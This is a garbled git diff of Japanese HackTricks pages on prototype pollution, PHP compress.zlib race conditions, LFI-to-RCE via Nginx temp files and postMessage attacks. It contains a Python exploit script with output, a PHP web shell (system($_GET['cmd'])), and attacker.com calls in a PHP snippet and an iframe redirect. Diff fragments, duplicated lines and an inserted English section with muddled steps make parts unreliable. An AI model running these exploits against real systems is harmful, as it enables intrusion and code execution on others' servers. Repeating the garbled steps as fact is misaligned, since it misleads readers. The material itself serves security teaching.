プロトタイプに文字列などのプリミティブを割り当てると、**プロトタイプはオブジェクトである必要があるため、ノーオペレーションが生成**されます。`Object.prototype` にプロトタイプオブジェクトを割り当てようとすると、これは**例外をスロー**します。これら2つの動作を使用して、**プロトタイプ汚染が成功したかどうかを検出**できます。
|
||||
```javascript
|
||||
({}).__proto__.__proto__={}//throws type exception
|
||||
({}).__proto__.__proto__="x"//no-op does not throw exception
|
||||
```
|
||||
### 反映された値
|
||||
|
||||
アプリケーションがレスポンスにオブジェクトを含める場合、**`__proto__`と並んで異常な名前の属性を作成**すると興味深いです。特に、**レスポンスに異常な属性だけが返される**場合、これはアプリケーションの脆弱性を示している可能性があります:
|
||||
アプリケーションがレスポンスにオブジェクトを含む場合、**`__proto__`と並んで異常な名前の属性**を作成すると興味深いです。特に、**レスポンスに異常な属性だけが返される**場合、これはアプリケーションの脆弱性を示している可能性があります:
|
||||
```json
|
||||
{"unusualName":"value","__proto__":"test"}
|
||||
```
|
||||
|
@ -120,16 +118,16 @@ Expressには、**クエリ文字列パラメータからオブジェクトを
|
|||
```
|
||||
**`?foo.bar=baz`はNodeでオブジェクトを作成します。**
|
||||
|
||||
## 参照
|
||||
## 参考文献
|
||||
|
||||
* [https://portswigger.net/research/server-side-prototype-pollution](https://portswigger.net/research/server-side-prototype-pollution)
|
||||
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンであり、企業やその顧客が**盗まれたマルウェア**によって**侵害**されたかどうかをチェックするための**無料**機能を提供しています。
|
||||
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンであり、企業やその顧客が**盗難マルウェア**によって**侵害**されたかどうかをチェックするための**無料**機能を提供しています。
|
||||
|
||||
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃と戦うことです。
|
||||
|
||||
|
@ -143,10 +141,10 @@ WhiteIntelの主な目標は、情報窃取マルウェアによるアカウン
|
|||
|
||||
HackTricksをサポートする他の方法:
|
||||
|
||||
* **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
* [**公式PEASS&HackTricksスワッグ**](https://peass.creator-spring.com)を手に入れる
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見つける
|
||||
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)を**フォロー**する。
|
||||
* **HackTricks**と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出して、あなたのハッキングトリックを共有してください。
|
||||
* **HackTricksで企業を宣伝したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
* [**公式PEASS&HackTricksスワッグ**](https://peass.creator-spring.com)を入手する
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[NFTs](https://opensea.io/collection/the-peass-family)コレクションを見つける
|
||||
* **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)をフォローする。
|
||||
* **HackTricks**と**HackTricks Cloud**のgithubリポジトリにPRを提出して、あなたのハッキングトリックを共有してください。
|
||||
|
||||
</details>
|
||||
|
|
|
@ -4,23 +4,23 @@
|
|||
|
||||
HackTricksをサポートする他の方法:
|
||||
|
||||
- **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
- [**公式PEASS&HackTricksスワッグ**](https://peass.creator-spring.com)を入手する
|
||||
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)、当社の独占的な[NFT](https://opensea.io/collection/the-peass-family)コレクションを発見する
|
||||
- **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)で**フォロー**する。
|
||||
- **HackTricks**と**HackTricks Cloud**のGitHubリポジトリにPRを提出して、あなたのハッキングテクニックを共有してください。
|
||||
* **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
* [**公式PEASS&HackTricksスワッグ**](https://peass.creator-spring.com)を入手する
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)、当社の独占的な[NFTs](https://opensea.io/collection/the-peass-family)コレクションを発見する
|
||||
* **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)に参加する**または[telegramグループ](https://t.me/peass)に参加する**または**Twitter**で**@carlospolopm**をフォローする**。
|
||||
* **HackTricks**と**HackTricks Cloud**のgithubリポジトリにPRを提出して、あなたのハッキングトリックを共有してください。
|
||||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、企業やその顧客が**スチーラーマルウェア**によって**侵害**されていないかをチェックする**無料**機能を提供しています。
|
||||
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、**盗難マルウェア**による**侵害**を受けたかどうかを確認するための**無料**機能を提供しています。
|
||||
|
||||
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃と戦うことです。
|
||||
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃に対抗することです。
|
||||
|
||||
彼らのウェブサイトをチェックして、**無料**でエンジンを試すことができます:
|
||||
彼らのウェブサイトをチェックし、**無料**でエンジンを試すことができます:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
|
@ -28,15 +28,17 @@ WhiteIntelの主な目標は、情報窃取マルウェアによるアカウン
|
|||
|
||||
## `compress.zlib://` および `PHP_STREAM_PREFER_STDIO`
|
||||
|
||||
フラグ `PHP_STREAM_PREFER_STDIO` を使用してプロトコル `compress.zlib://` で開かれたファイルは、後から接続に到着するデータを同じファイルに継続して書き込むことができます。
|
||||
`compress.zlib://`プロトコルを使用して`PHP_STREAM_PREFER_STDIO`フラグで開かれたファイルは、後で同じファイルに到着するデータを書き込み続けることができます。
|
||||
|
||||
これは、次のような呼び出しを意味します:
|
||||
```php
|
||||
file_get_contents("compress.zlib://http://attacker.com/file")
|
||||
```
|
||||
以下のようにして、http://attacker.com/file へのリクエストを送信し、サーバーは有効なHTTPレスポンスでリクエストに応答し、接続を開いたままにしておき、後で追加のデータを送信し、それがファイルに書き込まれる可能性があります。
|
||||
```
|
||||
攻撃者.com/file にリクエストを送信し、サーバーは有効なHTTPレスポンスでリクエストに応答し、接続を維持したまま、後で追加のデータを送信し、それがファイルに書き込まれる可能性があります。
|
||||
|
||||
この情報は、php-srcコードのmain/streams/cast.cのこの部分で確認できます:
|
||||
この情報は、php-src コードの main/streams/cast.c のこの部分で確認できます:
|
||||
```
|
||||
```c
|
||||
/* Use a tmpfile and copy the old streams contents into it */
|
||||
|
||||
|
@ -46,25 +48,25 @@ if (flags & PHP_STREAM_PREFER_STDIO) {
|
|||
*newstream = php_stream_temp_new();
|
||||
}
|
||||
```
|
||||
## RCEへのレースコンディション
|
||||
## RCEへのRace Condition
|
||||
|
||||
[**このCTF**](https://balsn.tw/ctf\_writeup/20191228-hxp36c3ctf/#includer)は、前回のトリックを使用して解決されました。
|
||||
|
||||
攻撃者は、**`compress.zlib`**プロトコルを使用して、**被害者サーバーに攻撃者のサーバーからファイルを読み取る接続を開かせます**。
|
||||
|
||||
**この接続**が存在する間、攻撃者は、**サーバーによって漏洩された一時ファイルのパスを外部に送信**します。
|
||||
この**接続**が存在する間、攻撃者は、サーバーによって**漏洩された一時ファイルのパスを外部に送信**します。
|
||||
|
||||
**接続**がまだ開いている間、攻撃者は、自分が制御する一時ファイルを読み込むLFIを悪用します。
|
||||
**接続**がまだ開いている間、攻撃者は、自分が制御する一時ファイルを**ロードするLFIを悪用**します。
|
||||
|
||||
ただし、Webサーバーには、`<?`を含むファイルの読み込みを防ぐチェックがあります。したがって、攻撃者は**レースコンディション**を悪用します。まだ開いている接続で、**攻撃者**は、**Webサーバー**が**ファイルに禁止された文字が含まれているかを確認**した後に**PHPペイロードを送信**しますが、**コンテンツを読み込む前**に送信します。
|
||||
ただし、Webサーバーには、`<?`を含むファイルの読み込みを**防ぐチェック**があります。したがって、攻撃者は**Race Condition**を悪用します。まだ開いている接続で、**攻撃者**は、Webサーバーが**ファイルに禁止された文字が含まれているかを確認**した後に**PHPペイロードを送信**しますが、**その内容をロードする前**に送信します。
|
||||
|
||||
詳細については、[https://balsn.tw/ctf\_writeup/20191228-hxp36c3ctf/#includer](https://balsn.tw/ctf\_writeup/20191228-hxp36c3ctf/#includer)のレースコンディションとCTFの説明を確認してください。
|
||||
詳細については、Race ConditionとCTFの説明を[https://balsn.tw/ctf\_writeup/20191228-hxp36c3ctf/#includer](https://balsn.tw/ctf\_writeup/20191228-hxp36c3ctf/#includer)で確認してください。
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、企業やその顧客が**スティーラーマルウェア**によって**侵害**されていないかを確認する**無料**機能を提供しています。
|
||||
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、企業やその顧客が**盗難マルウェア**によって**侵害**されていないかを確認する**無料**機能を提供しています。
|
||||
|
||||
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃と戦うことです。
|
||||
|
||||
|
@ -78,10 +80,10 @@ WhiteIntelの主な目標は、情報窃取マルウェアによるアカウン
|
|||
|
||||
HackTricksをサポートする他の方法:
|
||||
|
||||
* **HackTricksで企業を宣伝したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
* [**公式PEASS&HackTricksスウォッグ**](https://peass.creator-spring.com)を手に入れる
|
||||
* **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
* [**公式PEASS&HackTricksスウォッグ**](https://peass.creator-spring.com)を入手する
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)コレクションを見つける
|
||||
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)を**フォロー**する。
|
||||
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)を**フォロー**する
|
||||
* **HackTricks**と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks)のGitHubリポジトリにPRを提出して、あなたのハッキングトリックを共有してください。
|
||||
|
||||
</details>
|
||||
|
|
|
@ -6,21 +6,21 @@
|
|||
|
||||
HackTricksをサポートする他の方法:
|
||||
|
||||
- **HackTricksで企業を宣伝したい**か**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
- **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
- [**公式PEASS&HackTricksのグッズ**](https://peass.creator-spring.com)を入手する
|
||||
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見つける
|
||||
- **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter** 🐦で**@hacktricks_live**をフォローする
|
||||
- **HackTricks**と**HackTricks Cloud**のGitHubリポジトリにPRを提出して、あなたのハッキングテクニックを共有する
|
||||
- **HackTricks**および**HackTricks Cloud**のGitHubリポジトリにPRを提出して、あなたのハッキングテクニックを共有してください。
|
||||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、**盗難マルウェア**による**侵害**を受けたかどうかを確認するための**無料**機能を提供しています。
|
||||
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンであり、企業やその顧客が**盗難マルウェア**によって**侵害**されていないかをチェックする**無料**機能を提供しています。
|
||||
|
||||
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃に対抗することです。
|
||||
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃と戦うことです。
|
||||
|
||||
彼らのウェブサイトをチェックし、**無料**でエンジンを試すことができます:
|
||||
|
||||
|
@ -32,7 +32,7 @@ WhiteIntelの主な目標は、情報窃取マルウェアによるアカウン
|
|||
|
||||
**[https://bierbaumer.net/security/php-lfi-with-nginx-assistance/](https://bierbaumer.net/security/php-lfi-with-nginx-assistance/)からの例**
|
||||
|
||||
- PHPコード:
|
||||
* PHPコード:
|
||||
````h`
|
||||
<?php include_once($_GET['file']);
|
||||
```
|
||||
|
@ -50,7 +50,7 @@ chown -R 0:0 /tmp /var/tmp /var/lib/php/sessions
|
|||
chmod -R 000 /tmp /var/tmp /var/lib/php/sessions
|
||||
...
|
||||
```
|
||||
幸いにも、PHPは現在、PHP-FPMとNginxを介してよく展開されています。Nginxは、クライアントの本体(投稿に限定されない)がある一定の閾値よりも大きい場合、一時ファイルを書き込む[クライアント本体バッファリング](https://nginx.org/en/docs/http/ngx\_http\_core\_module.html#client\_body\_buffer\_size)機能を提供しています。
|
||||
幸いなことに、PHPは現在、よくPHP-FPMとNginxを介して展開されています。Nginxは、クライアントの本体(投稿に限定されない)がある一定の閾値よりも大きい場合、一時ファイルを書き込む[クライアント本体バッファリング](https://nginx.org/en/docs/http/ngx\_http\_core\_module.html#client\_body\_buffer\_size)機能を提供しています。
|
||||
|
||||
この機能により、NginxがPHPと同じユーザーとして実行されている場合(www-dataとして非常に一般的)、他のファイル作成方法なしにLFIを悪用することが可能です。
|
||||
|
||||
|
@ -71,7 +71,7 @@ if (fd != -1 && !persistent) {
|
|||
return fd;
|
||||
}
|
||||
```
|
||||
以下のように、Nginxによって**tempfileが開かれた直後にunlinkされる**ことがわかります。幸いにも、**procfsを使用して削除されたファイルへの参照を取得**することができます。レースを利用して:
|
||||
以下のように、Nginxによって開かれた**一時ファイルはすぐにリンク解除される**ことがわかります。幸いにも、**procfsを使用して削除されたファイルへの参照を取得する**ことができます。競合を利用します:
|
||||
```
|
||||
...
|
||||
/proc/34/fd:
|
||||
|
@ -86,9 +86,9 @@ lrwx------ 1 www-data www-data 64 Dec 25 23:57 14 -> socket:[44927]
|
|||
lrwx------ 1 www-data www-data 64 Dec 25 23:58 15 -> /var/lib/nginx/body/0000001368 (deleted)
|
||||
...
|
||||
```
|
||||
注意:この例では、PHPの`include`関数を使用して直接`/proc/34/fd/15`を含めることはできません。なぜなら、パスが`/var/lib/nginx/body/0000001368 (deleted)`に解決され、ファイルシステムに存在しないためです。幸いなことに、この小さな制限は`/proc/self/fd/34/../../../34/fd/15`のような間接的な方法でバイパスすることができ、最終的に削除された`/var/lib/nginx/body/0000001368`ファイルの内容を実行できます。
|
||||
|
||||
## 完全なエクスプロイト
|
||||
|
||||
注意: この例では、PHPの`include`関数に`/proc/34/fd/15`を直接含めることはできません。なぜなら、パスが`/var/lib/nginx/body/0000001368 (deleted)`に解決され、ファイルシステムに存在しないためです。幸いなことに、この小さな制限は`/proc/self/fd/34/../../../34/fd/15`のような間接的な手法によって回避することができ、最終的に削除された`/var/lib/nginx/body/0000001368`ファイルの内容を実行することができます。
|
||||
```python
|
||||
#!/usr/bin/env python3
|
||||
import sys, threading, requests
|
||||
|
@ -158,38 +158,19 @@ a = threading.Thread(target=bruter, args=(pid, ))
|
|||
a.start()
|
||||
```
|
||||
```
|
||||
# LFI to RCE via Nginx temp files
|
||||
## LFI to RCE via Nginx temp files
|
||||
|
||||
## Description
|
||||
When Nginx processes a request, it stores temporary files in the `/var/lib/nginx/tmp/client_body` directory. These files are used to store the request body when buffering is enabled. An attacker can exploit this behavior by leveraging a Local File Inclusion (LFI) vulnerability to write malicious PHP code into one of these temporary files. Once the PHP code is written, the attacker can then trigger its execution by requesting the corresponding resource.
|
||||
|
||||
When a server running Nginx is vulnerable to Local File Inclusion (LFI), it is possible to escalate the attack to Remote Code Execution (RCE) by abusing Nginx temporary files.
|
||||
### Steps to achieve LFI to RCE via Nginx temp files:
|
||||
|
||||
## Exploitation
|
||||
1. Identify the target web application and confirm the presence of a Local File Inclusion vulnerability.
|
||||
2. Craft a PHP payload that you want to execute on the target system.
|
||||
3. Use the LFI vulnerability to write the PHP payload into one of the Nginx temporary files.
|
||||
4. Trigger the execution of the PHP payload by requesting the corresponding resource that includes the temporary file.
|
||||
5. Gain remote code execution on the target system.
|
||||
|
||||
1. Identify the Nginx temporary directory:
|
||||
- Default location: `/var/lib/nginx/tmp/client_body`
|
||||
- Can be different based on the Nginx configuration
|
||||
|
||||
2. Create a PHP script with the payload for RCE:
|
||||
```php
|
||||
<?php system($_GET['cmd']); ?>
|
||||
```
|
||||
|
||||
3. Trigger the LFI vulnerability to include the PHP script in the Nginx temp file:
|
||||
```
|
||||
http://target.com/index.php?page=../../../../../../../../../../var/lib/nginx/tmp/client_body/your_script.php
|
||||
```
|
||||
|
||||
4. Access the PHP script through the web server to execute commands:
|
||||
```
|
||||
http://target.com/tmp/client_body/your_script.php?cmd=whoami
|
||||
```
|
||||
|
||||
## Prevention
|
||||
|
||||
- Avoid using LFI vulnerable code in web applications
|
||||
- Restrict access to the Nginx temporary directory
|
||||
- Regularly monitor and clean up temporary files
|
||||
By abusing Nginx's temporary file storage, an attacker can escalate a simple LFI vulnerability into a Remote Code Execution (RCE) attack, potentially gaining full control over the target system.
|
||||
```
|
||||
```
|
||||
$ ./pwn.py 127.0.0.1 1337
|
||||
|
@ -325,9 +306,9 @@ read_file_multiprocess(requests_session, nginx_pids)
|
|||
|
||||
* [https://bierbaumer.net/security/php-lfi-with-nginx-assistance/](https://bierbaumer.net/security/php-lfi-with-nginx-assistance/)
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、企業やその顧客が**スティーラーマルウェア**によって**侵害**されていないかをチェックする**無料**機能を提供しています。
|
||||
|
||||
|
@ -339,12 +320,12 @@ WhiteIntelの主な目標は、情報窃取マルウェアによるアカウン
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>**htARTE (HackTricks AWS Red Team Expert)**を使って、ゼロからヒーローまでAWSハッキングを学ぶ</strong></summary>
|
||||
<summary><strong>**htARTE (HackTricks AWS Red Team Expert)**</strong>を使って、ゼロからAWSハッキングをマスターしましょう!</summary>
|
||||
|
||||
HackTricksをサポートする他の方法:
|
||||
|
||||
* **HackTricksで会社を宣伝したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
* [**公式PEASS&HackTricksスワッグ**](https://peass.creator-spring.com)を手に入れる
|
||||
* **HackTricksで企業を宣伝したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
* [**公式PEASS&HackTricksスウォッグ**](https://peass.creator-spring.com)を手に入れる
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[NFTs](https://opensea.io/collection/the-peass-family)コレクションを見つける
|
||||
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)や[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)を**フォロー**する。
|
||||
* **HackTricks**と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出して、あなたのハッキングトリックを共有してください。
|
||||
|
|
|
@ -1,30 +1,30 @@
|
|||
# PostMessage脆弱性
|
||||
# PostMessageの脆弱性
|
||||
|
||||
## PostMessage脆弱性
|
||||
## PostMessageの脆弱性
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>**htARTE(HackTricks AWS Red Team Expert)**で**ゼロからヒーローまでのAWSハッキング**を学びましょう!</strong></summary>
|
||||
<summary><strong>**htARTE(HackTricks AWS Red Team Expert)**でAWSハッキングをゼロからヒーローまで学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
HackTricksをサポートする他の方法:
|
||||
|
||||
- **HackTricksで企業を宣伝**したい場合や**HackTricksをPDFでダウンロード**したい場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
- [**公式PEASS&HackTricksスワッグ**](https://peass.creator-spring.com)を入手する
|
||||
- [**公式PEASS&HackTricksグッズ**](https://peass.creator-spring.com)を入手する
|
||||
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見つける
|
||||
- **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)をフォローする
|
||||
- **ハッキングテクニックを共有するために、[HackTricks](https://github.com/carlospolop/hacktricks)と[HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してください。**
|
||||
- **HackTricks**と**HackTricks Cloud**のGitHubリポジトリにPRを提出して、あなたのハッキングテクニックを共有する
|
||||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、企業やその顧客が**盗難マルウェア**によって**侵害**されていないかを確認する**無料**機能を提供しています。
|
||||
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、企業やその顧客が**盗難マルウェア**によって**侵害**されていないかをチェックする**無料**機能を提供しています。
|
||||
|
||||
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃と戦うことです。
|
||||
|
||||
彼らのウェブサイトをチェックし、**無料**でエンジンを試すことができます:
|
||||
彼らのウェブサイトをチェックして、**無料**でエンジンを試すことができます:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
|
@ -58,14 +58,13 @@ win = open('URL-with-iframe-inside', 'hack', 'width=800,height=300,top=500');
|
|||
## loop until win.length == 1 (until the iframe is loaded)
|
||||
win[0].postMessage('{"__proto__":{"isAdmin":True}}', '*')
|
||||
```
|
||||
注意してください、**targetOrigin** は '\*' または _https://company.com_ のような URL になります。\
|
||||
**第二のシナリオ**では、**メッセージはそのドメインにのみ送信**されます(たとえウィンドウオブジェクトのオリジンが異なっていても)。\
|
||||
**ワイルドカード**が使用されると、**メッセージは任意のドメインに送信**され、ウィンドウオブジェクトのオリジンに送信されます。
|
||||
**targetOrigin**は'\*'または_https://company.com_のようなURLになります。**第2のシナリオ**では、**メッセージはそのドメインにのみ送信**できます(たとえウィンドウオブジェクトの起源が異なっていても)。\
|
||||
**ワイルドカード**が使用されると、**メッセージは任意のドメインに送信**され、ウィンドウオブジェクトの起源に送信されます。
|
||||
|
||||
### iframe と **targetOrigin** のワイルドカードへの攻撃
|
||||
### iframeと**targetOrigin**のワイルドカード攻撃
|
||||
|
||||
[**このレポート**](https://blog.geekycat.in/google-vrp-hijacking-your-screenshots/)で説明されているように、**X-Frame-Header** 保護がないページを見つけ、**ワイルドカード** (\*) を使用して **postMessage** を介して **機密メッセージ** を送信している場合、**iframe** の **origin** を **変更**して、**機密** メッセージを自分が制御するドメインに **漏洩** させることができます。\
|
||||
ページが iframed できる場合でも、**targetOrigin** が **URL に設定されていてワイルドカードではない**場合、この **トリックは機能しません**。
|
||||
[**このレポート**](https://blog.geekycat.in/google-vrp-hijacking-your-screenshots/)で説明されているように、**X-Frame-Header**保護がないページを見つけ、**ワイルドカード**(\*)を使用して**postMessage**を介して**機密**メッセージを送信している場合、**iframe**の**起源**を**変更**して、**機密**メッセージを自分が制御するドメインに**漏洩**させることができます。\
|
||||
ページがiframedであっても**targetOrigin**が**URLに設定されていてワイルドカードではない**場合、この**トリックは機能しません**。
|
||||
```markup
|
||||
<html>
|
||||
<iframe src="https://docs.google.com/document/ID" />
|
||||
|
@ -82,7 +81,7 @@ window.frames[0].frame[0][2].location="https://attacker.com/exploit.html";
|
|||
```
|
||||
## addEventListenerの悪用
|
||||
|
||||
**`addEventListener`**は、JSによって使用される関数で、**`postMessages`を受信する関数を宣言**するために使用されます。\
|
||||
**`addEventListener`**は、JSが**`postMessages`を受け取る関数を宣言する**ために使用される関数です。\
|
||||
次のようなコードが使用されます:
|
||||
```javascript
|
||||
window.addEventListener("message", (event) => {
|
||||
|
@ -94,34 +93,34 @@ return;
|
|||
```
|
||||
### 列挙
|
||||
|
||||
現在のページで**イベントリスナーを見つける**には、以下を行うことができます:
|
||||
現在のページで**イベントリスナーを見つける**には、次のことができます:
|
||||
|
||||
- JSコードを検索して`window.addEventListener`と`$(window).on`(_JQueryバージョン_)を検索します
|
||||
- JSコードで`window.addEventListener`と`$(window).on`(_JQueryバージョン_)を**検索**
|
||||
- 開発者ツールのコンソールで実行:`getEventListeners(window)`
|
||||
|
||||
![](<../../.gitbook/assets/image (618) (1).png>)
|
||||
|
||||
- ブラウザの開発者ツールで_Elements --> Event Listeners_に移動します
|
||||
- ブラウザの開発者ツールで_Elements --> Event Listeners_に移動
|
||||
|
||||
![](<../../.gitbook/assets/image (393).png>)
|
||||
|
||||
- [**https://github.com/benso-io/posta**](https://github.com/benso-io/posta)や[https://github.com/fransr/postMessage-tracker](https://github.com/fransr/postMessage-tracker)のような**ブラウザ拡張機能**を使用します。これらのブラウザ拡張機能は**すべてのメッセージを傍受**して表示します。
|
||||
- [**https://github.com/benso-io/posta**](https://github.com/benso-io/posta)や[https://github.com/fransr/postMessage-tracker](https://github.com/fransr/postMessage-tracker)のような**ブラウザ拡張機能**を使用する。これらのブラウザ拡張機能は**すべてのメッセージを傍受**して表示します。
|
||||
|
||||
### オリジンチェックの回避
|
||||
### オリジンチェックのバイパス
|
||||
|
||||
- **`event.isTrusted`**属性は、本物のユーザーアクションによって生成されたイベントに対してのみ`True`を返すため、セキュアと見なされます。正しく実装されていればバイパスするのは難しいですが、セキュリティチェックにおける重要性は顕著です。
|
||||
- PostMessageイベントでのオリジン検証に**`indexOf()`**を使用することはバイパスの可能性があります。この脆弱性を示す例は次のとおりです:
|
||||
- **`event.isTrusted`**属性は、本物のユーザーアクションによって生成されたイベントに対してのみ`True`を返すため、セキュアと見なされます。正しく実装されていればバイパスするのは難しいですが、セキュリティチェックにおける重要性は高いです。
|
||||
- PostMessageイベントでのオリジン検証に**`indexOf()`**を使用すると、バイパスされる可能性があります。この脆弱性を示す例:
|
||||
|
||||
```javascript
|
||||
("https://app-sj17.marketo.com").indexOf("https://app-sj17.ma")
|
||||
```
|
||||
